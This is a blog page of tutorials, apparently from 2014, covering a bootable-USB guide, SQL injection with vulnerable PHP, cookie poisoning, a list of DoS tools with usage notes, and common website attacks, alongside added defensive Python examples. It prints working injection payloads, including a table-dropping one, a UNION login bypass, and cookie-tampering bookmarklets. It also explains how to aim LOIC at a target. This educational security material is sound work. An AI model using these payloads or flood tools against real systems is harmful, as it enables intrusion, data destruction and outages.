Showing posts with label tutorial. Show all posts

Wednesday, February 26, 2014

Remove HTML entities from text


Remove HTML entities from text - Online tool

About the online un-escape tool

The un-escape tool decodes the HTML entities in the text you paste (for example &amp;, &lt;, &quot; and numeric forms such as &#39;) back into the characters they stand for and returns the plain text. Keep in mind that decoded text is no longer safe to drop into an HTML page as-is: if it is rendered again it must be re-escaped, otherwise an entity-encoded <script> tag becomes live markup.

Saturday, February 22, 2014

How to make bootable USB without any software?

This tutorial shows how to create a bootable USB drive for Windows Vista or 7 that you can use to install either on any system that can boot from USB. It is very useful when you have no DVD drive.


Step 1: Insert the USB stick (4 GB or larger) and back up anything on it: the drive is going to be wiped and reformatted.

Step 2: Open an elevated Command Prompt. Type CMD in the Start menu search field and press Ctrl + Shift + Enter, or go to Start > All Programs > Accessories, right-click Command Prompt and choose Run as administrator.

Step 3: In the Command Prompt, run:

DISKPART

LIST DISK

LIST DISK prints every disk attached to the system. Identify your USB drive by its size; on my machine it shows up as Disk 1. Getting this number wrong means wiping the wrong disk in the next step, so check it twice.

Step 4: Enter the following commands one by one, pressing Enter after each. CLEAN erases the partition table of the selected disk, so make sure SELECT DISK points at the USB stick.

SELECT DISK 1 (replace 1 with your disk number)

CLEAN

CREATE PARTITION PRIMARY

SELECT PARTITION 1

ACTIVE

FORMAT FS=NTFS

(A full format can take several minutes; FORMAT FS=NTFS QUICK is faster.)

ASSIGN

EXIT


Step 5: Copy the entire contents of the Windows DVD (or of the mounted ISO) to the USB drive.

You are done with your bootable USB. You can now use it in place of the bootable DVD on any computer that can boot from USB (most current motherboards support this).

If the drive does not boot, write a Windows boot sector to it with bootsect.exe from the installation media:

Step 6: Insert the Windows DVD in the optical drive and note the drive letters of the optical drive and of the USB drive. Here "F" is my DVD drive and "H" my USB drive.

Step 7: Back in the elevated Command Prompt, run:

F: (where "F" is your DVD drive letter)

CD BOOT

BOOTSECT.EXE /NT60 H:

(where "H" is your USB drive letter)

If you have no DVD and the installation files sit on the hard drive of another computer, change the drive letter to that drive, for example:

D:\Boot>BOOTSECT.EXE /NT60 H:

where D: is the hard drive that holds the installation files.



Note that this guide does not work when the USB drive is prepared on a Windows XP computer, because XP's diskpart does not support these operations on removable drives.

SQL Injections Attack with Examples

This article explains the basics of SQL injection with a worked example and then lists ways to prevent it.
As the name suggests, the attack is carried out through SQL queries. Many web developers do not realise how an attacker can tamper with the queries their code builds. SQL injection works against a web application that does not validate user input and trusts whatever the user provides: the idea is to make the application run SQL the developer never intended.

All the examples mentioned in this article are tested with the following:
  • PHP 5.3.3-7
  • Apache/2.2.16
  • Postgresql 8.4

SQL Injection Example

Most web applications have a login page, so we will start with one. Assume the application's login page is written as follows.
index.html:
<html>
<head><title>SQL Injection Demo</title></head>
 <body onload="document.getElementById('user_name').focus();" >
 <form name="login_form" id="login_form" method="post" action="login.php">
  <table border=0 align="center" >
   <tr>
    <td colspan=5 align="center" ><font face="Century Schoolbook L" > Login Page </font></td>
   </tr>
   <tr>
    <td> User Name:</td><td> <input type="text" size="13" id="user_name" name="user_name" value=""></td>
   </tr>
   <tr>
    <td> Password: </td><td> <input type="password" size="13" id="pass_word" name="pass_word" value=""></td>
   </tr>
   <tr>
    <td colspan=2 align="center"><input type="submit" value="Login"></td>
   </tr>
  </table>
 </form>
</body>
</html>
When the user submits user_name and pass_word, they are sent to login.php with an HTTP POST.
login.php:
<?php
$Host= '192.168.1.8';
$Dbname= 'john';
$User= 'john';
$Password= 'xxx';
$Schema = 'test'; 

$Connection_string="host=$Host dbname=$Dbname user=$User password=$Password"; 

/* Connect with database asking for a new connection*/
$Connect=pg_connect($Connection_string,PGSQL_CONNECT_FORCE_NEW); 

/* Error checking the connection string */
if (!$Connect) {
 echo "Database Connection Failure";
 exit;
} 

$query="SELECT * from $Schema.users where user_name='".$_POST['user_name']."' and password='".$_POST['pass_word']."';"; 

$result=pg_query($Connect,$query);
$rows = pg_num_rows($result);
if ($rows) {
 echo "Login Success";
}
else {
 echo "Login Failed";
}
?>
The line that starts with $query="SELECT *... is vulnerable to SQL injection: the values of $_POST['user_name'] and $_POST['pass_word'] are pasted into the SQL text without escaping or parameterization. The query works as intended when the user supplies a real username and password, but an attacker can craft the input. In the username field, instead of a username, the attacker enters:
' or 1=1;--
and leaves the password field empty.
When the attacker clicks submit, the values are posted to login.php and the query becomes:
SELECT * from test.users where user_name='' or 1=1;--' and password='';
This is valid SQL. In PostgreSQL "--" starts a comment that runs to the end of the line, so everything after it (the password check) is ignored and the database executes:
select * from test.users where user_name='' or 1=1;
The WHERE clause is true for every row, so the query returns the whole table, pg_num_rows is non-zero and the page prints "Login Success".
If the attacker knows a table name, the same field can be used to drop it, because pg_query() accepts several semicolon-separated statements in one call:
';drop table test.lop;--
Some login code avoids comparing the password inside the query and instead does the following:
  • stores the password in the database as an md5 hash (unsalted md5 is itself a weak choice, but it is what this example uses),
  • first selects user_name and password from the database for the supplied user name,
  • then md5-hashes the password the user typed and compares it with the hash from the database,
  • and reports success if both match.
Let's see how that can be bypassed when the lookup query is still vulnerable to SQL injection.
login.php:
$query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';"; 

$result=pg_query($Connect,$query); 

$row=pg_fetch_array($result,NULL,PGSQL_ASSOC); 

# Find the md5 for the user supplied password.
$user_pass = md5($_POST['pass_word']); 

if(strcmp($user_pass,$row['password'])!=0) {
 echo "Login Failed\n";
}
else {
 echo "Login Success\n";
}
Now enter the following in the username field:
' UNION ALL SELECT 'laksh','202cb962ac59075b964b07152d234b70
Enter "123" in the password field and click submit. md5("123") is 202cb962ac59075b964b07152d234b70.
The query now expands to:
SELECT user_name,password from test.members where user_name='' UNION ALL SELECT 'laksh','202cb962ac59075b964b07152d234b70';
No row matches the empty user name, so the row the database returns is the one the UNION supplied: 'laksh' as the username and '202cb962ac59075b964b07152d234b70' as the password hash.
Since "123" was posted in the pass_word field, md5 of the supplied password equals the hash the attacker injected, strcmp returns 0 and authentication succeeds without the attacker knowing any real user's password.
These are just two examples of SQL injection; there are many variations. The following reduce the chance of a successful attack:
  • Strict type checking: don't trust what the user enters. If a field should be an integer, convert and validate it as one before it goes anywhere near a query.
  • If you expect a user name, validate that it contains only the characters a user name may have (for example letters, digits and underscore) and reject anything else.
  • Use prepared statements (in PHP with PostgreSQL: pg_prepare()/pg_execute() or pg_query_params()) so that user input is always bound as a value and never becomes part of the SQL text. This is the primary defence.
  • Escape special characters (pg_escape_string() or pg_escape_literal()) only where a value genuinely cannot be parameterized.
  • Don't allow multiple statements to be executed in one call; pg_query() accepts "a; b" but pg_query_params() does not.
  • Don't leak database information to the end user by displaying raw "syntax error" messages; log them server-side and show a generic failure.
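Added example (not the article's code): the same two bypasses run against an in-memory sqlite3 database, with a parameterized version of the lookup beside them. The table contents are constructed; sqlite3 stands in for the PostgreSQL backend above, the first payload uses the `--` comment form without the semicolon (which works the same way in PostgreSQL), and md5 is kept only to mirror the article.

```python
"""Vulnerable string-built login queries next to a parameterized one.

Added example: sqlite3 stands in for the PostgreSQL backend of the article,
and the rows below are constructed test data.
"""
import hashlib
import hmac
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """'users' keeps plaintext passwords like the first login.php;
    'members' keeps md5 hashes like the second."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_name TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('john', 'xxx')")
    con.execute("CREATE TABLE members (user_name TEXT, password TEXT)")
    con.execute("INSERT INTO members VALUES ('john', ?)",
                (hashlib.md5(b"xxx").hexdigest(),))
    return con


def login_concat(con: sqlite3.Connection, user_name: str, pass_word: str) -> bool:
    """First login.php: both inputs pasted into the SQL text.
    A user name of  ' OR 1=1--  makes the WHERE clause always true and
    comments out the password check."""
    query = ("SELECT * FROM users WHERE user_name='" + user_name
             + "' AND password='" + pass_word + "'")
    return len(con.execute(query).fetchall()) > 0


def login_md5_concat(con: sqlite3.Connection, user_name: str, pass_word: str) -> bool:
    """Second login.php: the hash is compared in application code, but the
    row lookup is still concatenated, so a UNION can hand back a row whose
    'password' column is whatever hash the attacker chooses."""
    query = ("SELECT user_name, password FROM members WHERE user_name='"
             + user_name + "'")
    row = con.execute(query).fetchone()
    if row is None:
        return False
    return hashlib.md5(pass_word.encode()).hexdigest() == row[1]


USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def login_safe(con: sqlite3.Connection, user_name: str, pass_word: str) -> bool:
    """Hardened version: allow-list the user name, bind it as a parameter so
    the driver never treats it as SQL, and compare hashes in constant time."""
    if not USERNAME_RE.match(user_name):
        return False
    row = con.execute(
        "SELECT user_name, password FROM members WHERE user_name = ?",
        (user_name,),
    ).fetchone()
    if row is None:
        return False
    given = hashlib.md5(pass_word.encode()).hexdigest()  # md5 only to mirror the article
    return hmac.compare_digest(given, row[1])


# Payloads from the article; the second one carries md5('123').
OR_PAYLOAD = "' OR 1=1--"
UNION_PAYLOAD = "' UNION ALL SELECT 'laksh','202cb962ac59075b964b07152d234b70"

if __name__ == "__main__":
    con = make_db()
    print("concat bypass:", login_concat(con, OR_PAYLOAD, ""))            # True
    print("md5 bypass:   ", login_md5_concat(con, UNION_PAYLOAD, "123"))  # True
    print("safe, OR:     ", login_safe(con, OR_PAYLOAD, ""))              # False
    print("safe, UNION:  ", login_safe(con, UNION_PAYLOAD, "123"))        # False
    print("safe, real:   ", login_safe(con, "john", "xxx"))               # True
```

Run it directly to see the two vulnerable functions accept the injected inputs while login_safe rejects both and still accepts the real credentials. The allow-list is the cheap first line; the bound parameter is what closes the hole, because the driver sends the SQL text and the value separately and the quote, the comment marker and the UNION are never parsed as SQL.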

Cookie Poisoning

Web site cookie poisoning came up twice in the last week while testing, so now is a good time to talk about how to test for it. I'm not going to go into the details of how a cookie works, but rather how to poison one. If you want the details of how cookies work from a testing point of view, read this respectable paper.

Web sites use cookies, a lot of them. Cookies can be permanent (on disk) or temporary (in memory), and they carry variables the site cares about; those variables can be tampered with, or "poisoned", to get results the site didn't intend to give you. Take the following test pages as an example. They are simple: if the cookie has the right content you receive a 50% discount; if it doesn't, you don't. The first page sets the cookie to "SpecialOffer=No", meaning you are not eligible by default. The code that sets it looks like this:

<SCRIPT>
document.cookie = "SpecialOffer=No";
</SCRIPT>
Now, if you click the link "Click here to see if you are eligible for 50% discount" you'll see that you are not eligible for the discount. The check on the 2nd page is pretty simple too and looks like this:

<SCRIPT>
var pos = document.cookie.indexOf( "SpecialOffer=Yes" );
if( pos == -1 ) {
document.write("I'm sorry you are NOT eligible for the 50% discount");
}
else {
document.write("You are eligible for the 50% discount");
}
</SCRIPT>
The script looks for "SpecialOffer=Yes" in the cookie string and reacts accordingly; without it you aren't eligible. Now, on to the fun stuff! How do you make yourself eligible? We need to change the cookie from "SpecialOffer=No" to "SpecialOffer=Yes". There are quite a few ways to change cookie values; these are my three favourites:

1. Add N Edit Cookies FireFox extension
2. Paros Proxy
3. Paste the following JavaScript in the URL bar to view the cookies:
javascript:alert(document.cookie.split(';').join(' \n'))

and the following to modify it:
javascript:alert(window.c=function a(n,v,nv) {c=document.cookie;c=c.substring(c.indexOf(n) +n.length,c.length);c=c.substring(1,((c.indexOf("; ")>-1) ? c.indexOf(";") : c.length));nc=unescape(c).replace (v,nv);document.cookie=n+"="+escape(nc);return unescape (document.cookie);});alert(c(prompt("cookie name:",""), prompt("replace this value:",""),prompt("with::","")));
How to poison cookies with Add N Edit Cookies

1. Navigate to http://www.qainsight.net/examples/cookietest.htm in FireFox
2. Click the cookie icon in your FireFox toolbar
3. Find the cookie for www.QAInsight.net and double click it or highlight it and press the edit button
4. Change the content form field from "No" to "Yes" (case sensitive)
5. Go back to the browser and click the link "Click here to see if you are eligible for 50% discount"
6. KaaaaPOW.... You now have the 50% discount! You're a freakin' evil, bad to the bone tester!

How to poison cookies with Paros Proxy
Typically I wouldn't use Paros in this situation because the cookie is set on the client side (you won't see that much in the real world), so the following is less cookie poisoning than JavaScript manipulation. It assumes you have cleared your browser cache, otherwise the page will not be fetched through the proxy:

1. Start Paros and set your IE connection options to use a proxy at address 127.0.0.1, port 8080
2. In Paros click the "Trap" tab and check the "Trap Request" and "Trap Response" checkboxes
3. Navigate to http://www.qainsight.net/examples/cookietest.htm in IE
4. Go back to Paros (Trap tab) and press the "continue" button until you see the following text in the bottom pane:
<SCRIPT>
document.cookie = "SpecialOffer=No";
</SCRIPT>
5. Change the "No" to "Yes" in the above line
6. Click the "Continue" button.
7. Go back to IE and click the link "Click here to see if you are eligible for 50% discount"
8. Whoot! You now have the 50% discount! You're one sexy cool tester with a severity 1 defect that needs to be submitted.

There are situations where you need to change the cookie value in the header (the top pane of the Trap tab) on the response or the request, for example when server- or client-side code rewrites the cookie, so that it has to be changed before the response is rendered or before the request is sent. That is when Paros is the better choice over Add N Edit Cookies.

How to poison cookies with JavaScript

1. Navigate to http://www.qainsight.net/examples/cookietest.htm in IE
2. To view the set cookie, type the following in the URL bar:
javascript:alert(document.cookie.split(';').join(' \n'))
3. You will see "SpecialOffer=No". Click Ok
4. Copy and paste the following JavaScript in the browser URL bar:
javascript:alert(window.c=function a(n,v,nv) {c=document.cookie;c=c.substring(c.indexOf(n) +n.length,c.length);c= c.substring(1,((c.indexOf(";")>-1) ? c.indexOf(";") : c.length)); nc=unescape(c).replace(v,nv); document.cookie= n+"="+escape(nc);return unescape(document.cookie);}); alert(c(prompt("cookie name:",""), prompt("replace this value:",""), prompt("with::","")));
5. Hit the enter key
6. Click the Ok button at the JavaScript Alert
7. Type the cookie name of SpecialOffer in the Alert box and click the Ok button
8. At the "replace this value" script prompt type No and press the Ok button
9. At the "with:" script prompt type Yes (case sensitive) and press the Ok button
10. The next alert will show you the replaced cookie. You should see: SpecialOffer=Yes
11. Click the Ok button
12. In IE click the link "Click here to see if you are eligible for 50% discount"
13. DingDingDingDing.... You're a winner! You now have the 50% discount! You're quite the bad-ass tester aren't you? You're like the wicked witch in Snow White but instead of poisoning apples you poison cookies.

And that's how I conduct cookie poisoning when testing. Not too tough, eh? If I ever get confused about the state of the cookies before and after poisoning, I use HTTPWatch to get a better idea of what is going on; the cookie and header tabs usually give me the gist of it.

When do you test for cookie poisoning? Whenever a cookie is being used! Is it a defect if you can manipulate the cookie? Not necessarily. It is a defect when the cookie drives or restricts the site's behaviour and you can exploit that, as in the discount example: anything stored in a cookie is under the user's control, so the server must not trust its contents unless it can verify them. If manipulating a cookie gains you nothing, it's not much of a finding. But it's important to know what the cookie you are poisoning does; without that you may be poisoning something and not seeing the exploit. To avoid guesswork, work with your developer to understand what the site does with cookies so you can go straight for the kill.
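The check a server should perform instead of trusting the cookie, as an added example that is not part of the original post: the server signs the value it sets with an HMAC under a server-side secret and ignores any value whose MAC does not verify. The key, the header parser and the discount rule are assumptions written to match the SpecialOffer demo pages above.

```python
"""Server-side defence against cookie poisoning: sign what you set, verify what you read.

Added example, not part of the original post. The secret key, cookie name
and the discount rule are constructed to match the SpecialOffer demo page.
"""
import hashlib
import hmac
from typing import Dict, Optional

# Assumption: a per-deployment secret that never leaves the server.
SECRET_KEY = b"demo-only-secret-rotate-me"


def sign_cookie(name: str, value: str, key: bytes = SECRET_KEY) -> str:
    """Return 'value|mac'. The MAC covers the cookie name too, so a signed
    value cannot be copied into a different cookie."""
    mac = hmac.new(key, f"{name}={value}".encode(), hashlib.sha256).hexdigest()
    return f"{value}|{mac}"


def verify_cookie(name: str, raw: str, key: bytes = SECRET_KEY) -> Optional[str]:
    """Return the value if the MAC checks out, else None (unsigned or tampered)."""
    value, sep, mac = raw.rpartition("|")
    if not sep:
        return None
    expected = hmac.new(key, f"{name}={value}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return value


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Split a Cookie request header ('a=1; b=2') the way a server sees it."""
    cookies: Dict[str, str] = {}
    for part in header.split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            cookies[k] = v
    return cookies


def discount_percent(cookie_header: str) -> int:
    """What the discount page should do: honour the cookie only if it verifies."""
    raw = parse_cookie_header(cookie_header).get("SpecialOffer")
    if raw is None:
        return 0
    return 50 if verify_cookie("SpecialOffer", raw) == "Yes" else 0


if __name__ == "__main__":
    issued = sign_cookie("SpecialOffer", "No")
    print(discount_percent(f"SpecialOffer={issued}"))                        # 0
    print(discount_percent(f"SpecialOffer={issued.replace('No', 'Yes')}"))   # 0: MAC fails
    print(discount_percent("SpecialOffer=Yes"))                              # 0: unsigned
    print(discount_percent(f"SpecialOffer={sign_cookie('SpecialOffer', 'Yes')}"))  # 50
```

Poisoning the signed cookie to Yes now yields the same 0% as an unsigned Yes. Signing stops tampering, not reading, so a cookie that must stay secret needs encryption or, better, an opaque session identifier with the eligibility kept server-side.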

Happy poisoning!

Denial-of-Service (DoS) Attack and Free DoS Attacking Tools

The denial of service (DoS) attack is one of the blunter weapons used to harm a company or organization (don't confuse it with DOS, Microsoft's disk operating system). It causes service outages, and the cost grows with the duration of the attack. In the past few years its use has increased because of freely available tools. Traffic from a single copy of such a tool can usually be blocked at a firewall, but a distributed, well-built attack bypasses most simple restrictions. In this post we look at the DoS attack, its variants, the tools used to perform it, how to defend against it and how not to become part of one.

What Is a Denial of Service Attack?

A DoS attack is an attempt to make a system or service unavailable to legitimate users and, ultimately, to take it down. This is achieved by flooding the server's request queue or connection table with bogus requests until it can no longer serve legitimate ones.

In general there are two forms of DoS attack: one crashes the server (usually by triggering a bug), the other only floods a service with more work than it can handle.


DDOS or Distributed Denial of Service Attack

This is the more complex and more powerful version of the DoS attack, in which many attacking systems are involved: many computers run the DoS attack against the same target at once. Because the attack is distributed over a large group of machines, it is known as a distributed denial of service attack.

To perform a DDoS attack, attackers use a zombie network (a botnet): a group of compromised computers on which the attacker has silently installed the attack tool. Whenever the attacker wants to launch a DDoS, every machine in the botnet joins in.

In simple words, when a server is flooded with bogus requests from many sources (potentially hundreds of thousands), that is a DDoS attack. Blocking one or a few IP addresses does not help. The more members in the botnet, the more powerful the attack. Botnets are generally built by infecting machines with a Trojan.

There are basically three types of DDoS attack:

Application-layer DDoS attack
Protocol DDoS attack
Volume-based DDoS attack

Application-layer DDoS attack: these attacks target the application itself (a web server such as Apache or IIS, or the code behind it) with requests that look legitimate, such as HTTP GET/POST floods and slow POSTs, exhausting worker threads, connection pools or database capacity; some variants exploit a software bug to crash the server outright. They are measured in requests per second and are the hardest to tell apart from real traffic.

Protocol DDoS attack: a DDoS attack at the protocol level, consuming state in the server or in intermediate firewalls and load balancers. This category includes SYN floods, Ping of Death, fragmented-packet attacks and the like.

Volume-based DDoS attack: ICMP floods, UDP floods and other floods, often sent from spoofed source addresses, that saturate the target's bandwidth. These are measured in bits per second.

There are many tools available for free that can be used to flood a server and perform an attack. A few tools also support a zombie network to perform DDOS attacks. For this post, we have compiled a few freely available DOS attacking tools.

Free DOS Attacking Tools

1. LOIC (Low Orbit Ion Canon)

LOIC is one of the most popular DoS attacking tools freely available on the Internet. It was used by the hacker group Anonymous against the networks of many big companies; Anonymous not only used it, but asked Internet users to join its DDoS attacks via IRC.

A single user can run it to perform a DoS attack on a small server. It is easy to use, even for a beginner: it floods the victim with UDP, TCP or HTTP requests, and you only need the URL or IP address of the server.

Enter the URL or IP address and then select the attack parameters; if you are not sure, leave the defaults. When you are done, click the big button labelled "IMMA CHARGIN MAH LAZER" and it starts attacking the target. Within a few seconds a small site will stop responding to your requests.

The tool also has a HIVEMIND mode, in which the client takes its target from an IRC channel so that one operator can direct many copies at once. That is how it is used for DDoS rather than single-source DoS.

The most important thing to know is that LOIC does nothing to hide your IP address. If you are planning to use LOIC to attack someone, think again. A proxy will not help, because the flood would hit the proxy and not the target. Using this tool against a server you do not own can land you in serious trouble.

Download LOIC


2. XOIC

XOIC is another DoS attacking tool. It performs a DoS attack on any server given an IP address, a user-selected port and a user-selected protocol. Its developers claim that XOIC is more powerful than LOIC in many ways. Like LOIC it comes with an easy-to-use GUI, so a beginner can use it to attack other websites or servers.

The tool has three attack modes. The first, test mode, is very basic. The second is a normal DoS attack mode. The third is a DoS attack mode that sends a TCP/HTTP/UDP/ICMP message.

It is effective against small websites. Only run it against a server you own or are authorized to test, and never a production one: it is quite capable of bringing the server down.

Download XOIC

3. HULK (HTTP Unbearable Load King)

HULK is a DoS tool that makes every request it sends unique (randomised URL parameters, headers and the like) so that the traffic does not match any fixed pattern a signature-based defence could block.

It picks a user agent at random from a list of real browsers for each request, forges the Referer header, and varies the requests so that caches are bypassed and each one reaches the server's own resource pool.

According to its developer, a test against an IIS 7 web server with 4 GB of RAM brought the server down in under a minute.

Download HULK
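As an added example, not part of the original post, the kind of check that does catch HULK-style traffic: the randomised user agents and referrers only defeat pattern matching, so a detector that counts requests per source address in a sliding window still flags the client. The log format, the thresholds and the sample lines are constructed.

```python
"""Per-source request-rate detection over web server access logs.

Added example, not part of the original post. The log lines are constructed:
one client behaves like HULK (random paths, referrers and user agents at a
high rate), the other is an ordinary visitor.
"""
import random
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line: str) -> Optional[dict]:
    """One combined-format line -> dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m["ip"], "ts": ts, "req": m["req"], "ua": m["ua"]}


def find_flooders(lines: List[str], window_seconds: int = 10,
                  threshold: int = 20) -> Dict[str, int]:
    """Sliding window per source address. Returns {ip: peak requests seen
    inside one window} for every address that reached the threshold.
    Only the address and timestamp are counted, so random user agents and
    referrers do not help the attacker here."""
    windows: Dict[str, deque] = defaultdict(deque)
    flagged: Dict[str, int] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        q = windows[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged


def make_sample_log() -> List[str]:
    """Constructed log: 40 HULK-style hits in 8 seconds from 203.0.113.7 and
    6 normal hits over a minute from 198.51.100.20."""
    rng = random.Random(7)
    agents = ["Mozilla/5.0 (Windows NT 6.1)", "Mozilla/5.0 (X11; Linux)", "Opera/9.80"]
    t0 = datetime(2014, 2, 22, 12, 0, 0, tzinfo=timezone.utc)
    events = []
    for i in range(40):
        ts = t0 + timedelta(milliseconds=200 * i)
        events.append((ts, "203.0.113.7", f"GET /?{rng.randrange(10**9)} HTTP/1.1",
                       f"http://www.google.com/?q={rng.randrange(10**6)}", rng.choice(agents)))
    for i in range(6):
        ts = t0 + timedelta(seconds=10 * i)
        events.append((ts, "198.51.100.20", "GET /index.html HTTP/1.1", "-", agents[0]))
    events.sort(key=lambda e: e[0])
    return [
        f'{ip} - - [{ts.strftime("%d/%b/%Y:%H:%M:%S %z")}] "{req}" 200 512 "{ref}" "{ua}"'
        for ts, ip, req, ref, ua in events
    ]


if __name__ == "__main__":
    for ip, peak in find_flooders(make_sample_log()).items():
        print(f"{ip}: {peak} requests within 10s")   # only 203.0.113.7 is listed
```

This is single-source detection. A real DDoS spreads the same load across thousands of addresses that each stay under the threshold, which is why distributed and volumetric attacks need upstream filtering or a scrubbing service rather than a log-based rule.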


4. DDOSIM—Layer 7 DDOS Simulator

DDOSIM is another popular DOS attacking tool. As the name suggests, it is used to perform DDOS attacks by simulating several zombie hosts. All zombie hosts create full TCP connections to the target server.

This tool is written in C++ and runs on Linux systems.

These are main features of DDOSIM

Simulates several zombies in attack
Random IP addresses
TCP-connection-based attacks
Application-layer DDOS attacks
HTTP DDoS with valid requests
HTTP DDoS with invalid requests (similar to a DC++ attack)
SMTP DDoS
TCP connection flood on random port
Download DDOSIM here

Read more about this tool here

5. R-U-Dead-Yet

R-U-Dead-Yet, RUDY for short, is an HTTP POST DoS tool. It performs a slow POST attack: it announces a very large form submission with a long Content-Length header and then sends the body one byte at a time at long intervals, keeping the server's connection slots tied up. The tool has an interactive console menu; it detects the forms on a given URL and lets you choose which forms and fields to use for the POST-based attack.

Download RUDY

6. Tor’s Hammer

Tor's Hammer is another slow POST DoS testing tool, written in Python. Its extra feature is that it can be run through the Tor network so that the attacker stays anonymous. Against an unprotected Apache or IIS server it can exhaust the connection pool within seconds.

Download TOR’s Hammer here

7. PyLoris

PyLoris is described as a server testing tool and can be used to perform a DoS attack on a service. It can work through SOCKS proxies and over SSL connections, and it can target various protocols, including HTTP, FTP, SMTP, IMAP and Telnet. The latest version comes with a simple GUI. Unlike flood-style tools, it attacks the service itself in the Slowloris manner, holding many connections open with partial requests until the server runs out of connection slots.

Download PyLoris

8. OWASP DOS HTTP POST

This OWASP tool performs HTTP POST denial-of-service tests. You can use it to check whether your web server can withstand a slow POST attack; like the others, it can also be used to attack a site.

Download here

9. DAVOSET

DAVOSET (DDoS attacks via other sites execution tool) performs DDoS attacks by relaying requests through functionality on other web sites, so that the victim sees traffic from those sites rather than from the attacker. The latest version adds support for cookies along with other features. You can download DAVOSET for free from Packet Storm.

Download DavoSET

10. GoldenEye HTTP Denial Of Service Tool

GoldenEye is a simple but effective HTTP DoS tool. It was written in Python for testing, but people also use it as an attack tool.

Download GoldenEye

Common methods to hack a website

Gone are the days when website hacking was a sophisticated art. Today anybody with an Internet connection can start attacking your website; all it takes is a Google search for "how to hack website", "hack into a website", "hacking a website" and so on. This article is not an attempt to teach website hacking but to raise awareness of some common methods.


The Simple SQL Injection Hack

SQL injection means entering SQL code into web forms (login fields, for example) or into the browser's address bar so that it reaches the database behind the site or application and reads or manipulates it.
When you enter text in the username and password fields of a login screen, your input is typically inserted into an SQL command. That command checks what you entered against the relevant table; if the input matches a row you are granted access, if not you're knocked back out.

In its simplest form, that is how SQL injection works: if the input is inserted as text rather than bound as a value, an attacker can change what the command does. The SQL Injection post above walks through the code.


Cross site scripting ( XSS ): 

Cross-site scripting, or XSS, is one of the most common web application flaws. An attacker injects script into a page the site serves to other users, and the script runs in those users' browsers with the site's privileges, typically to steal session cookies or other information. Malicious hackers use it to attack sites; security testers use it to find and fix the holes. XSS can be hard to spot and stop, and it leaves the site and its users open to identity, financial and data theft. Site owners should understand how cross-site scripting works and how it can affect them and their users, so they can put the necessary controls (output encoding, input validation, a content security policy) in place.

If you want to know more, see my other post on cross-site scripting with an example.

Denial of service ( Ddos attack ):

A denial of service attack (DoS) renders a system unusable, or significantly slows it down for legitimate users, by overloading its resources so that nobody can access it. This is not hacking a website as such, but it is used to take a website down. An attacker who cannot get into a machine will often just crash it instead, which makes this one of the most used attacks against websites.

For more information on DDoS attacks, see the article above.

Cookie Poisoning: 

Cookie poisoning is a lot like SQL injection: if the server concatenates cookie values into its queries, the same 'OR'1'='1 payloads work from a cookie. You begin by displaying your cookies:
javascript:alert(document.cookie)
You might then see something like
"username=JohnDoe" and "password=iloveJaneDoe"
in which case the cookie poisoning could be:
javascript:void(document.cookie="username='OR'1'='1");
javascript:void(document.cookie="password='OR'1'='1");

View more on Cookie Poisoning

Password Cracking: 

Hashed passwords can often be recovered by brute force or a dictionary attack. Bad news, and particularly so if your hashed passwords and user names are sitting in an unprotected file somewhere and a Google hacker comes across it. You might think that because your password now looks like XWE42GH64223JHTF6533H in one of those files it can't be cracked. Wrong. Freely available tools recover a large proportion of unsalted hashes of common passwords in minutes. The defence is a slow, salted password hash (bcrypt, scrypt or PBKDF2), so that each guess is expensive and each user's hash has to be attacked separately.
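Added example, not code from the original post: a dictionary attack against an unsalted md5 hash, and the same attack against a salted PBKDF2 hash to show what the defence changes. The word list and the hashes are constructed, and the iteration count is kept low so the demo runs quickly.

```python
"""Dictionary attack on unsalted md5 next to a salted, iterated hash.

Added example, not from the original post. The word list and the stored
hashes are constructed; the iteration count is kept low for the demo
(use far more in production).
"""
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Constructed word list; real attacks use lists with millions of entries.
WORDLIST = ["password", "123456", "letmein", "iloveJaneDoe", "qwerty"]


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()


def crack_md5(target_hex: str, words: Iterable[str]) -> Optional[str]:
    """Unsalted md5: one cheap hash per guess, and one precomputed table
    cracks every user who chose the same password."""
    for w in words:
        if md5_hex(w) == target_hex:
            return w
    return None


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = 50_000) -> str:
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt, stored as one string."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def crack_pbkdf2(stored: str, words: Iterable[str]) -> Optional[str]:
    """Same dictionary attack. It still finds a weak password, but every
    guess now costs `iterations` HMACs, and the per-user salt means the
    work cannot be precomputed or shared across accounts."""
    for w in words:
        if verify_password(w, stored):
            return w
    return None


if __name__ == "__main__":
    print(crack_md5(md5_hex("letmein"), WORDLIST))                        # letmein
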